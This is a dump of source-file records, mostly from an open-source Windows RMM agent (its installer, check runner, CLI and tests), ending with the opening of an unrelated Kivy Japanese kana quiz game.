hDC,\n f\"Agent: {self.agent_status}\",\n -1,\n (0, 0, 384, 201),\n win32con.DT_SINGLELINE | win32con.DT_CENTER | win32con.DT_VCENTER,\n )\n\n win32gui.DrawText(\n hDC,\n f\"Check Runner: {self.check_status}\",\n -1,\n (0, 0, 384, 241),\n win32con.DT_SINGLELINE | win32con.DT_CENTER | win32con.DT_VCENTER,\n )\n win32gui.DrawText(\n hDC,\n f\"Salt Minion: {self.salt_status}\",\n -1,\n (0, 0, 384, 281),\n win32con.DT_SINGLELINE | win32con.DT_CENTER | win32con.DT_VCENTER,\n )\n win32gui.DrawText(\n hDC,\n f\"Mesh Agent: {self.mesh_status}\",\n -1,\n (0, 0, 384, 321),\n win32con.DT_SINGLELINE | win32con.DT_CENTER | win32con.DT_VCENTER,\n )\n\n win32gui.EndPaint(self.hwnd, paintStruct)\n win32gui.UpdateWindow(self.hwnd)\n\n def OnDestroy(self, hwnd, message, wparam, lparam):\n win32gui.PostQuitMessage(0)\n return True\n\n try:\n agent_status = psutil.win_service_get(\"tacticalagent\").status()\n except psutil.NoSuchProcess:\n agent_status = \"Not Installed\"\n\n try:\n salt_status = psutil.win_service_get(\"salt-minion\").status()\n except psutil.NoSuchProcess:\n salt_status = \"Not Installed\"\n\n try:\n check_status = psutil.win_service_get(\"checkrunner\").status()\n except psutil.NoSuchProcess:\n check_status = \"Not Installed\"\n\n try:\n mesh_status = psutil.win_service_get(\"Mesh Agent\").status()\n except psutil.NoSuchProcess:\n mesh_status = \"Not Installed\"\n\n if gui:\n win32gui.ShowWindow(window, win32con.SW_HIDE)\n w = AgentStatus(agent_status, salt_status, check_status, mesh_status)\n win32gui.PumpMessages()\n win32gui.CloseWindow(window)\n else:\n print(\"Agent: \", agent_status)\n print(\"Check Runner: \", check_status)\n print(\"Salt Minion: \", salt_status)\n print(\"Mesh Agent: \", mesh_status)\n" }, { "alpha_fraction": 0.6089502573013306, "alphanum_fraction": 0.6210790276527405, "avg_line_length": 24.86516761779785, "blob_id": "b66923614041695b705df5569cd26cd19a99f622", "content_id": "08acf43f2aa5c52841d15a4d8fe2551737c9f4d5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2391, "license_type": "permissive", "max_line_length": 94, "num_lines": 89, "path": "/tests/test_agent.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import os\r\nimport platform\r\nimport sys\r\nfrom unittest import mock\r\n\r\nimport pytest\r\nimport validators\r\n\r\nsys.path.append(\r\n os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\\\\winagent\"))\r\n)\r\n\r\nfrom agent import WindowsAgent\r\n\r\n\r\[email protected](scope=\"session\", autouse=True)\r\[email protected](\"agent.WindowsAgent.__init__\", return_value=None)\r\ndef agent(self):\r\n return WindowsAgent()\r\n\r\n\r\ndef test_boot_time(agent):\r\n assert type(agent.get_boot_time()) is float\r\n\r\n\r\ndef test_used_ram(agent):\r\n assert type(agent.get_used_ram()) is int\r\n\r\n\r\ndef test_total_ram(agent):\r\n assert type(agent.get_total_ram()) is int\r\n\r\n\r\[email protected](\"TRAVIS\" in os.environ, reason=\"doesn't work in travis\")\r\ndef test_services(agent):\r\n services = agent.get_services()\r\n spooler = list(filter(lambda x: x[\"name\"] == \"Spooler\", services))[0]\r\n assert type(services) is list\r\n assert spooler[\"display_name\"] == \"Print Spooler\"\r\n assert spooler[\"username\"] == \"LocalSystem\"\r\n\r\n\r\ndef test_disks(agent):\r\n disks = agent.get_disks()\r\n assert disks[\"C:\"][\"device\"] == \"C:\"\r\n\r\n\r\ndef test_os(agent):\r\n assert \"Microsoft Windows\" in agent.get_os()\r\n\r\n\r\ndef test_cmd_output(agent):\r\n output = agent.get_cmd_output([\"ping\", \"8.8.8.8\"])\r\n success = [\"Reply\", \"bytes\", \"time\", \"TTL\"]\r\n assert all(x in output for x in success)\r\n\r\n\r\ndef test_public_ip(agent):\r\n error = []\r\n if not validators.ipv4(agent.get_public_ip()) and not validators.ipv6(\r\n agent.get_public_ip()\r\n ):\r\n error.append(\"not ipv4 or ipv6\")\r\n\r\n assert not error\r\n\r\n\r\ndef test_platform_release(agent):\r\n assert \"windows\" in agent.get_platform_release().lower()\r\n\r\n\r\ndef test_arch(agent):\r\n agent.programdir = \"C:\\\\Program Files\\\\TacticalAgent\"\r\n\r\n if platform.machine().lower() == \"amd64\":\r\n agent.arch = \"64\"\r\n assert (\r\n agent.salt_minion_exe\r\n == \"https://github.com/wh1te909/winagent/raw/master/bin/salt-minion-setup.exe\"\r\n )\r\n assert agent.nssm == \"C:\\\\Program Files\\\\TacticalAgent\\\\nssm.exe\"\r\n\r\n if platform.machine().lower() == \"x86\":\r\n agent.arch = \"32\"\r\n assert (\r\n agent.salt_minion_exe\r\n == \"https://github.com/wh1te909/winagent/raw/master/bin/salt-minion-setup-x86.exe\"\r\n )\r\n assert agent.nssm == \"C:\\\\Program Files\\\\TacticalAgent\\\\nssm-x86.exe\"\r\n" }, { "alpha_fraction": 0.4522045850753784, "alphanum_fraction": 0.454673707485199, "avg_line_length": 27.842105865478516, "blob_id": "0deddf176dcd7e48a7c6f9253dac36badc40a7a9", "content_id": "c25ece970c6ae2b82364a642d52d9d1faee84672", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2835, "license_type": "permissive", "max_line_length": 86, "num_lines": 95, "path": "/winagent/checkrunner.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import asyncio\r\nimport json\r\nfrom time import sleep\r\n\r\nimport requests\r\n\r\nfrom agent import WindowsAgent\r\n\r\n\r\nclass CheckRunner(WindowsAgent):\r\n def __init__(self, log_level, log_to):\r\n super().__init__(log_level, log_to)\r\n self.checkrunner = (\r\n f\"{self.astor.server}/api/v2/{self.astor.agentid}/checkrunner/\"\r\n )\r\n\r\n def get_checks(self):\r\n try:\r\n resp = requests.get(\r\n self.checkrunner, headers=self.headers, timeout=15, verify=self.verify\r\n )\r\n except Exception as e:\r\n self.logger.debug(e)\r\n return False\r\n else:\r\n try:\r\n data = resp.json()\r\n if data[\"checks\"]:\r\n return data\r\n else:\r\n return False\r\n except Exception as e:\r\n self.logger.debug(e)\r\n return False\r\n\r\n async def run_checks(self, data):\r\n try:\r\n tasks = []\r\n checks = data[\"checks\"]\r\n\r\n for check in checks:\r\n\r\n if check[\"check_type\"] == \"cpuload\":\r\n tasks.append(self.cpu_load_check(check))\r\n\r\n elif check[\"check_type\"] == \"ping\":\r\n tasks.append(self.ping_check(check))\r\n\r\n elif check[\"check_type\"] == \"script\":\r\n tasks.append(self.script_check(check))\r\n\r\n elif check[\"check_type\"] == \"diskspace\":\r\n tasks.append(self.disk_check(check))\r\n\r\n elif check[\"check_type\"] == \"memory\":\r\n tasks.append(self.mem_check(check))\r\n\r\n elif check[\"check_type\"] == \"winsvc\":\r\n tasks.append(self.win_service_check(check))\r\n\r\n elif check[\"check_type\"] == \"eventlog\":\r\n tasks.append(self.event_log_check(check))\r\n\r\n await asyncio.gather(*tasks)\r\n\r\n except Exception as e:\r\n self.logger.debug(e)\r\n\r\n def run(self):\r\n ret = self.get_checks()\r\n if not ret:\r\n return False\r\n else:\r\n asyncio.run(self.run_checks(ret))\r\n\r\n def run_forever(self):\r\n self.logger.info(\"Checkrunner service started\")\r\n\r\n while 1:\r\n interval = 120\r\n try:\r\n ret = self.get_checks()\r\n except:\r\n sleep(interval)\r\n else:\r\n if ret:\r\n try:\r\n interval = int(ret[\"check_interval\"])\r\n asyncio.run(self.run_checks(ret))\r\n except Exception as e:\r\n self.logger.debug(e)\r\n finally:\r\n sleep(interval)\r\n else:\r\n sleep(interval)\r\n" }, { "alpha_fraction": 0.46290984749794006, "alphanum_fraction": 0.470016211271286, "avg_line_length": 29.614503860473633, "blob_id": "5a71d9e7b558b72cafba7ffe76b6f8d53bc93167", "content_id": "51d65bfade23625b444f781b0970f014a779c1d0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16042, "license_type": "permissive", "max_line_length": 108, "num_lines": 524, "path": "/winagent/installer.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import json\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\nfrom time import sleep\nfrom urllib.parse import urlparse\n\nimport psutil\nimport requests\nimport validators\n\nfrom agent import AgentStorage, WindowsAgent, db\nfrom mesh import MeshAgent\nfrom utils import disable_sleep_hibernate, enable_ping, enable_rdp\n\n\nclass Installer(WindowsAgent):\n def __init__(\n self,\n api_url,\n client_id,\n site_id,\n agent_desc,\n agent_type,\n power,\n rdp,\n ping,\n auth_token,\n local_salt,\n local_mesh,\n cert,\n cmd_timeout,\n log_level,\n log_to=\"stdout\",\n ):\n super().__init__(log_level, log_to)\n self.api_url = api_url\n self.client_id = client_id\n self.site_id = site_id\n self.agent_desc = agent_desc\n self.agent_type = agent_type\n self.disable_power = power\n self.enable_rdp = rdp\n self.enable_ping = ping\n self.auth_token = auth_token\n self.log_level = log_level\n self.log_to = log_to\n self.local_salt = local_salt\n self.local_mesh = local_mesh\n self.cert = cert\n self.cmd_timeout = cmd_timeout if cmd_timeout else 900\n\n def install(self):\n # check for existing installation and exit if found\n try:\n tac = psutil.win_service_get(\"tacticalagent\")\n except psutil.NoSuchProcess:\n pass\n else:\n self.logger.error(\n \"\"\"\n Found tacticalagent service. Please uninstall the existing Tactical Agent first before reinstalling.\n If you're trying to perform an upgrade, do so from the RMM web interface.\n \"\"\"\n )\n sys.stdout.flush()\n sys.exit(1)\n\n self.agent_id = self.generate_agent_id()\n self.logger.debug(f\"{self.agent_id=}\")\n sys.stdout.flush()\n\n # validate the url and get the salt master\n r = urlparse(self.api_url)\n\n if r.scheme != \"https\" and r.scheme != \"http\":\n self.logger.error(\"api url must contain https or http\")\n sys.stdout.flush()\n sys.exit(1)\n\n if validators.domain(r.netloc):\n self.salt_master = r.netloc\n # will match either ipv4 , or ipv4:port\n elif re.match(r\"[0-9]+(?:\\.[0-9]+){3}(:[0-9]+)?\", r.netloc):\n if validators.ipv4(r.netloc):\n self.salt_master = r.netloc\n else:\n self.salt_master = r.netloc.split(\":\")[0]\n else:\n self.logger.error(\"Error parsing api url, unable to get salt-master\")\n sys.stdout.flush()\n sys.exit(1)\n\n self.logger.debug(f\"{self.salt_master=}\")\n sys.stdout.flush()\n\n # set the api base url\n self.api = f\"{r.scheme}://{r.netloc}\"\n\n token_headers = {\n \"content-type\": \"application/json\",\n \"Authorization\": f\"Token {self.auth_token}\",\n }\n\n self.logger.debug(f\"{self.api=}\")\n self.logger.debug(f\"{token_headers=}\")\n\n minion = os.path.join(self.programdir, self.salt_installer)\n self.logger.debug(f\"{minion=}\")\n sys.stdout.flush()\n\n if not self.local_salt:\n # download salt\n print(\"Downloading salt minion\", flush=True)\n try:\n r = requests.get(\n self.salt_minion_exe,\n stream=True,\n timeout=900,\n )\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n if r.status_code != 200:\n self.logger.error(\n f\"{r.status_code}: Unable to download salt-minion from {self.salt_minion_exe}\"\n )\n sys.stdout.flush()\n sys.exit(1)\n\n with open(minion, \"wb\") as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk:\n f.write(chunk)\n\n del r\n else:\n try:\n shutil.copy2(self.local_salt, minion)\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n mesh = os.path.join(self.programdir, self.mesh_installer)\n self.logger.debug(f\"{mesh=}\")\n sys.stdout.flush()\n\n if not self.local_mesh:\n # download mesh agent\n try:\n r = requests.post(\n f\"{self.api}/api/v2/meshexe/\",\n json.dumps({\"arch\": self.arch}),\n headers=token_headers,\n stream=True,\n timeout=90,\n verify=self.cert,\n )\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n if r.status_code != 200:\n self.logger.error(r.json())\n sys.stdout.flush()\n sys.exit(1)\n\n with open(mesh, \"wb\") as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk:\n f.write(chunk)\n\n del r\n\n else:\n try:\n shutil.copy2(\n self.local_mesh, os.path.join(self.programdir, self.mesh_installer)\n )\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n # get the agent's token\n try:\n r = requests.post(\n f\"{self.api}/api/v2/newagent/\",\n json.dumps({\"agent_id\": self.agent_id}),\n headers=token_headers,\n timeout=15,\n verify=self.cert,\n )\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n if r.status_code != 200:\n self.logger.error(r.json())\n sys.stdout.flush()\n sys.exit(1)\n\n self.agent_token = r.json()[\"token\"]\n\n # check for existing mesh installations and remove\n meshAgent = MeshAgent(log_level=\"INFO\", log_to=\"stdout\")\n\n if meshAgent.mesh_dir:\n meshAgent.remove_mesh(exe=mesh)\n\n # install mesh\n self.mesh_node_id = meshAgent.install_mesh(\n exe=mesh, cmd_timeout=self.cmd_timeout\n )\n\n self.logger.debug(f\"{self.mesh_node_id=}\")\n sys.stdout.flush()\n\n print(\"Adding agent to dashboard\", flush=True)\n\n payload = {\n \"agent_id\": self.agent_id,\n \"hostname\": self.hostname,\n \"client\": self.client_id,\n \"site\": self.site_id,\n \"mesh_node_id\": self.mesh_node_id,\n \"description\": self.agent_desc,\n \"monitoring_type\": self.agent_type,\n }\n self.logger.debug(payload)\n sys.stdout.flush()\n\n try:\n r = requests.patch(\n f\"{self.api}/api/v2/newagent/\",\n json.dumps(payload),\n headers=token_headers,\n timeout=60,\n verify=self.cert,\n )\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n if r.status_code != 200:\n self.logger.error(r.json())\n sys.stdout.flush()\n sys.exit(1)\n\n self.agent_pk = r.json()[\"pk\"]\n self.salt_id = r.json()[\"saltid\"]\n\n try:\n with db:\n db.create_tables([AgentStorage])\n AgentStorage(\n server=self.api,\n agentid=self.agent_id,\n mesh_node_id=self.mesh_node_id,\n token=self.agent_token,\n agentpk=self.agent_pk,\n salt_master=self.salt_master,\n salt_id=self.salt_id,\n cert=self.cert if self.cert else None,\n ).save()\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n self.load_db()\n\n # install salt, remove any existing installations first\n try:\n oldsalt = psutil.win_service_get(\"salt-minion\")\n except psutil.NoSuchProcess:\n pass\n else:\n print(\"Found existing salt-minion. Removing\", flush=True)\n self.uninstall_salt()\n\n print(\"Installing the salt-minion, this might take a while...\", flush=True)\n\n salt_cmd = [\n self.salt_installer,\n \"/S\",\n \"/custom-config=saltcustom\",\n f\"/master={self.salt_master}\",\n f\"/minion-name={self.salt_id}\",\n \"/start-minion=1\",\n ]\n\n try:\n install_salt = subprocess.run(\n salt_cmd, cwd=self.programdir, shell=True, timeout=self.cmd_timeout\n )\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n attempts = 0\n retries = 20\n\n while 1:\n try:\n salt_svc = psutil.win_service_get(\"salt-minion\")\n except psutil.NoSuchProcess:\n self.logger.debug(\"Salt service not installed yet...\")\n sys.stdout.flush()\n attempts += 1\n sleep(5)\n else:\n salt_stat = salt_svc.status()\n if salt_stat != \"running\":\n self.logger.debug(f\"Salt status: {salt_stat}\")\n sys.stdout.flush()\n attempts += 1\n sleep(7)\n else:\n attempts = 0\n\n if attempts == 0:\n break\n elif attempts >= retries:\n self.logger.error(\"Unable to install the salt-minion\")\n self.logger.error(\n f\"Check the log file in {self.system_drive}\\\\salt\\\\var\\\\log\\\\salt\\\\minion\"\n )\n sys.stdout.flush()\n sys.exit(1)\n\n # accept the salt key on the master\n payload = {\"saltid\": self.salt_id, \"agent_id\": self.agent_id}\n accept_attempts = 0\n salt_retries = 20\n\n while 1:\n try:\n r = requests.post(\n f\"{self.api}/api/v2/saltminion/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=35,\n verify=self.cert,\n )\n except Exception as e:\n self.logger.debug(e)\n sys.stdout.flush()\n accept_attempts += 1\n sleep(5)\n else:\n if r.status_code != 200:\n accept_attempts += 1\n self.logger.debug(r.json())\n sys.stdout.flush()\n sleep(5)\n else:\n accept_attempts = 0\n\n if accept_attempts == 0:\n self.logger.debug(r.json())\n sys.stdout.flush()\n break\n elif accept_attempts >= salt_retries:\n self.logger.error(\"Unable to register salt with the RMM\")\n self.logger.error(\"Installation failed\")\n sys.stdout.flush()\n sys.exit(1)\n\n sleep(10)\n\n # sync salt modules\n self.logger.debug(\"Syncing salt modules\")\n sys.stdout.flush()\n\n sync_attempts = 0\n sync_retries = 20\n\n while 1:\n try:\n r = requests.patch(\n f\"{self.api}/api/v2/saltminion/\",\n json.dumps({\"agent_id\": self.agent_id}),\n headers=self.headers,\n timeout=30,\n verify=self.cert,\n )\n except Exception as e:\n self.logger.debug(e)\n sys.stdout.flush()\n sync_attempts += 1\n sleep(5)\n else:\n if r.status_code != 200:\n sync_attempts += 1\n self.logger.debug(r.json())\n sys.stdout.flush()\n sleep(5)\n else:\n sync_attempts = 0\n\n if sync_attempts == 0:\n self.logger.debug(r.json())\n sys.stdout.flush()\n break\n elif sync_attempts >= sync_retries:\n self.logger.error(\"Unable to sync salt modules\")\n self.logger.error(\"Installation failed\")\n sys.stdout.flush()\n sys.exit(1)\n\n sleep(10) # wait a bit for modules to fully sync\n\n self.send_system_info()\n\n # create the scheduled tasks\n try:\n self.create_fix_salt_task()\n self.create_fix_mesh_task()\n except Exception as e:\n self.logger.debug(e)\n sys.stdout.flush()\n\n # remove services if they exists\n try:\n tac = psutil.win_service_get(\"tacticalagent\")\n except psutil.NoSuchProcess:\n pass\n else:\n print(\"Found tacticalagent service. Removing...\", flush=True)\n subprocess.run([self.nssm, \"stop\", \"tacticalagent\"], capture_output=True)\n subprocess.run(\n [self.nssm, \"remove\", \"tacticalagent\", \"confirm\"], capture_output=True\n )\n\n try:\n chk = psutil.win_service_get(\"checkrunner\")\n except psutil.NoSuchProcess:\n pass\n else:\n print(\"Found checkrunner service. Removing...\", flush=True)\n subprocess.run([self.nssm, \"stop\", \"checkrunner\"], capture_output=True)\n subprocess.run(\n [self.nssm, \"remove\", \"checkrunner\", \"confirm\"], capture_output=True\n )\n\n # install the windows services\n print(\"Installing services...\", flush=True)\n svc_commands = [\n [\n self.nssm,\n \"install\",\n \"tacticalagent\",\n self.exe,\n \"-m\",\n \"winagentsvc\",\n ],\n [self.nssm, \"set\", \"tacticalagent\", \"DisplayName\", r\"Tactical RMM Agent\"],\n [self.nssm, \"set\", \"tacticalagent\", \"Description\", r\"Tactical RMM Agent\"],\n [self.nssm, \"start\", \"tacticalagent\"],\n [\n self.nssm,\n \"install\",\n \"checkrunner\",\n self.exe,\n \"-m\",\n \"checkrunner\",\n ],\n [\n self.nssm,\n \"set\",\n \"checkrunner\",\n \"DisplayName\",\n r\"Tactical RMM Check Runner\",\n ],\n [\n self.nssm,\n \"set\",\n \"checkrunner\",\n \"Description\",\n r\"Tactical RMM Check Runner\",\n ],\n [self.nssm, \"start\", \"checkrunner\"],\n ]\n\n for cmd in svc_commands:\n subprocess.run(cmd, capture_output=True)\n\n if self.disable_power:\n print(\"Disabling sleep/hibernate...\", flush=True)\n try:\n disable_sleep_hibernate()\n except:\n pass\n\n if self.enable_rdp:\n print(\"Enabling RDP...\", flush=True)\n try:\n enable_rdp()\n except:\n pass\n\n if self.enable_ping:\n print(\"Enabling ping...\", flush=True)\n try:\n enable_ping()\n except:\n pass\n\n print(\"Installation was successfull!\", flush=True)\n print(\n \"Allow a few minutes for the agent to properly display in the RMM\",\n flush=True,\n )\n sys.exit(0)\n" }, { "alpha_fraction": 0.5398335456848145, "alphanum_fraction": 0.5412604212760925, "avg_line_length": 30.263940811157227, "blob_id": "b0fbe398dec01bd1eba911c766344decd0212381", "content_id": "b04b3370f9cb64443cf565126c9ad5d042d6277a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8410, "license_type": "permissive", "max_line_length": 132, "num_lines": 269, "path": "/winagent/tacticalrmm.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import argparse\nimport os\nimport socket\nimport sys\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description=\"Tactical RMM Agent\")\n parser.add_argument(\"-m\", action=\"store\", dest=\"mode\", type=str)\n parser.add_argument(\"-p\", action=\"store\", dest=\"taskpk\", type=int)\n parser.add_argument(\"--api\", action=\"store\", dest=\"api_url\", type=str)\n parser.add_argument(\"--client-id\", action=\"store\", dest=\"client_id\", type=int)\n parser.add_argument(\"--site-id\", action=\"store\", dest=\"site_id\", type=int)\n parser.add_argument(\"--timeout\", action=\"store\", dest=\"cmd_timeout\", type=int)\n parser.add_argument(\n \"--desc\",\n action=\"store\",\n dest=\"agent_desc\",\n type=str,\n default=socket.gethostname(),\n )\n parser.add_argument(\n \"--agent-type\",\n action=\"store\",\n dest=\"agent_type\",\n type=str,\n default=\"server\",\n choices=[\"server\", \"workstation\"],\n )\n parser.add_argument(\n \"-l\",\n \"--log\",\n action=\"store\",\n dest=\"log_level\",\n type=str,\n default=\"INFO\",\n choices=[\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"CRITICAL\"],\n )\n parser.add_argument(\n \"--logto\",\n action=\"store\",\n dest=\"log_to\",\n type=str,\n default=\"file\",\n choices=[\"file\", \"stdout\"],\n )\n parser.add_argument(\"--auth\", action=\"store\", dest=\"auth_token\", type=str)\n parser.add_argument(\"--version\", action=\"store_true\")\n parser.add_argument(\"--power\", action=\"store_true\")\n parser.add_argument(\"--rdp\", action=\"store_true\")\n parser.add_argument(\"--ping\", action=\"store_true\")\n parser.add_argument(\n \"--local-salt\",\n action=\"store\",\n dest=\"local_salt\",\n type=str,\n help=r'The full path to the salt-minion executable e.g. \"C:\\\\temp\\\\salt-minion-setup.exe\"',\n )\n parser.add_argument(\n \"--local-mesh\",\n action=\"store\",\n dest=\"local_mesh\",\n type=str,\n help=r'The full path to the Mesh Agent executable e.g. \"C:\\\\temp\\\\meshagent.exe\"',\n )\n parser.add_argument(\n \"--cert\",\n action=\"store\",\n dest=\"cert\",\n type=str,\n help=r'The full path to the local cert e.g. \"C:\\\\temp\\\\ca.pem\"',\n )\n args = parser.parse_args()\n\n if args.version:\n from utils import show_version_info\n\n show_version_info()\n\n elif args.mode == \"install\":\n\n if (\n not args.api_url\n or not args.client_id\n or not args.site_id\n or not args.auth_token\n ):\n parser.print_help()\n sys.exit(1)\n\n if args.local_salt:\n if not os.path.exists(args.local_salt):\n parser.print_help()\n sys.stdout.flush()\n print(f\"\\nError: {args.local_salt} does not exist\\n\", flush=True)\n sys.exit(1)\n if not os.path.isfile(args.local_salt):\n parser.print_help()\n sys.stdout.flush()\n print(\n f\"\\nError: {args.local_salt} must be a file, not a folder.\",\n flush=True,\n )\n print(\n r'Make sure to use double backslashes for file paths, and double quotes e.g. \"C:\\\\temp\\\\salt-minion-setup.exe\"',\n flush=True,\n )\n print(\"\", flush=True)\n sys.exit(1)\n\n if args.local_mesh:\n if not os.path.exists(args.local_mesh):\n parser.print_help()\n sys.stdout.flush()\n print(f\"\\nError: {args.local_mesh} does not exist\\n\", flush=True)\n sys.exit(1)\n if not os.path.isfile(args.local_mesh):\n parser.print_help()\n sys.stdout.flush()\n print(\n f\"\\nError: {args.local_mesh} must be a file, not a folder.\",\n flush=True,\n )\n print(\n r'Make sure to use double backslashes for file paths, and double quotes e.g. \"C:\\\\temp\\\\meshagent.exe\"',\n flush=True,\n )\n print(\"\", flush=True)\n sys.exit(1)\n\n if args.cert:\n if not os.path.exists(args.cert):\n parser.print_help()\n sys.stdout.flush()\n print(f\"\\nError: {args.cert} does not exist\\n\", flush=True)\n sys.exit(1)\n if not os.path.isfile(args.cert):\n parser.print_help()\n sys.stdout.flush()\n print(\n f\"\\nError: {args.cert} must be a file, not a folder.\",\n flush=True,\n )\n print(\n r'Make sure to use double backslashes for file paths, and double quotes e.g. \"C:\\\\temp\\\\ca.pem\"',\n flush=True,\n )\n print(\"\", flush=True)\n sys.exit(1)\n\n from installer import Installer\n\n installer = Installer(\n api_url=args.api_url,\n client_id=args.client_id,\n site_id=args.site_id,\n agent_desc=args.agent_desc,\n agent_type=args.agent_type,\n power=args.power,\n rdp=args.rdp,\n ping=args.ping,\n auth_token=args.auth_token,\n log_level=args.log_level,\n local_salt=args.local_salt,\n local_mesh=args.local_mesh,\n cert=args.cert,\n cmd_timeout=args.cmd_timeout,\n )\n\n installer.install()\n\n elif args.mode == \"winagentsvc\":\n from winagentsvc import WinAgentSvc\n\n agent = WinAgentSvc(log_level=args.log_level, log_to=args.log_to)\n agent.run()\n\n elif args.mode == \"checkrunner\":\n from checkrunner import CheckRunner\n\n agent = CheckRunner(log_level=args.log_level, log_to=args.log_to)\n agent.run_forever()\n\n elif args.mode == \"runchecks\":\n from checkrunner import CheckRunner\n\n agent = CheckRunner(log_level=args.log_level, log_to=args.log_to)\n agent.run()\n\n elif args.mode == \"winupdater\":\n from winupdater import WinUpdater\n\n agent = WinUpdater(log_level=args.log_level, log_to=args.log_to)\n agent.install_all()\n\n elif args.mode == \"patchscan\":\n from winupdater import WinUpdater\n\n agent = WinUpdater(log_level=args.log_level, log_to=args.log_to)\n agent.trigger_patch_scan()\n\n elif args.mode == \"taskrunner\":\n from taskrunner import TaskRunner\n\n agent = TaskRunner(\n task_pk=args.taskpk, log_level=args.log_level, log_to=args.log_to\n )\n agent.run()\n\n elif args.mode == \"sysinfo\":\n from agent import WindowsAgent\n\n agent = WindowsAgent(log_level=args.log_level, log_to=args.log_to)\n agent.send_system_info()\n\n elif args.mode == \"updatesalt\":\n from agent import WindowsAgent\n\n agent = WindowsAgent(log_level=args.log_level, log_to=args.log_to)\n agent.update_salt()\n\n elif args.mode == \"fixsalt\":\n from agent import WindowsAgent\n\n agent = WindowsAgent(log_level=args.log_level, log_to=args.log_to)\n agent.fix_salt()\n\n elif args.mode == \"fixmesh\":\n from agent import WindowsAgent\n\n agent = WindowsAgent(log_level=args.log_level, log_to=args.log_to)\n agent.fix_mesh()\n\n elif args.mode == \"cleanup\":\n from agent import WindowsAgent\n\n agent = WindowsAgent(log_level=args.log_level, log_to=args.log_to)\n agent.fix_salt(by_time=False)\n agent.cleanup()\n\n elif args.mode == \"recoversalt\":\n from agent import WindowsAgent\n\n agent = WindowsAgent(log_level=args.log_level, log_to=args.log_to)\n agent.recover_salt()\n\n elif args.mode == \"recovermesh\":\n from agent import WindowsAgent\n\n agent = WindowsAgent(log_level=args.log_level, log_to=args.log_to)\n agent.recover_mesh()\n\n else:\n import win32gui\n\n from agent import show_agent_status\n\n window = win32gui.GetForegroundWindow()\n\n if window == 0:\n # called from cli with no interactive desktop\n show_agent_status(window=None, gui=False)\n else:\n show_agent_status(window=window, gui=True)\n\n\nif __name__ == \"__main__\":\n main()\n" } ]
12
lxin/jptest
https://github.com/lxin/jptest
4c45c4ad6ba047d4bccfb3fd566e58557ff924a0
ab0014b6b11afba052174b31873ec44d0d566c91
477ba53da788fcca75fd0983a0533d631f0e79b1
refs/heads/master
2020-03-30T13:32:53.180610
2018-10-13T08:00:48
2018-10-13T08:00:48
151,276,993
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5404970049858093, "alphanum_fraction": 0.5684815049171448, "avg_line_length": 38.82149124145508, "blob_id": "9fdf299d20f7cbab6ce7a360691c1d888f15c7af", "content_id": "caee5a52b75e8cec5049672a4705f00e112cc355", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22993, "license_type": "no_license", "max_line_length": 122, "num_lines": 577, "path": "/main.py", "repo_name": "lxin/jptest", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\nimport random, time, copy, os, pickle\nos.environ['KIVY_AUDIO'] = 'sdl2'\n\nimport kivy\nkivy.require('1.0.7')\n\nfrom kivy.config import Config\n\nfrom kivy.core.window import Window\nscale = kivy.metrics.sp(1)\ndef dp(v): return (v * scale) / 2\nWindow.size = (800, 600)\nWindow.clearcolor = (0.3, 0.3, 0.1, 0.3)\n\nfrom kivy.animation import Animation\nfrom kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.popup import Popup\nfrom kivy.core.window import Window, Keyboard\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.label import Label\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.core.audio import SoundLoader\nfrom kivy.uix.image import Image\nfrom kivy.uix.stacklayout import StackLayout\nfrom kivy.properties import NumericProperty\n\nfrom modules import jpmap\njp_maps=(jpmap.jp_map_h, jpmap.jp_map_k, jpmap.jp_map_t)\n\ntitle='Hiragana/Katakana Testing'\nconfs=(60, 0, 0, 1, 1, 30, 5, 6) # (time, character, mode, cheat, size, delay, flakes)\n\nbt_img='sources/btn.png'\nbg_img='sources/bg.jpg'\nbg_sound='sources/bg.wav'\nshot_sound='sources/sliencer.wav'\nmiss_sound='sources/reload.wav'\nconf_path=os.getenv(\"HOME\")+'/jptest.conf'\nextmap_path=os.getenv(\"HOME\")+'/jp_ext.map'\n\nfont_name='sources/DroidSansFallback'\nhelp_font='sources/CourierNew'\nflake_colors=((0.1,1,1,.7), (1,0.1,1,.7), (1,1,0.1,.7),\n(0.5,1,0.5,.7), (0.5,0.5,1,.7), (1,0.5,0.5,.7))\nbullet_color=(0,0,0,0)\nsize_hint=(None, None)\nflake_shape=\"♥\" #\"✿\" #\"♥\", 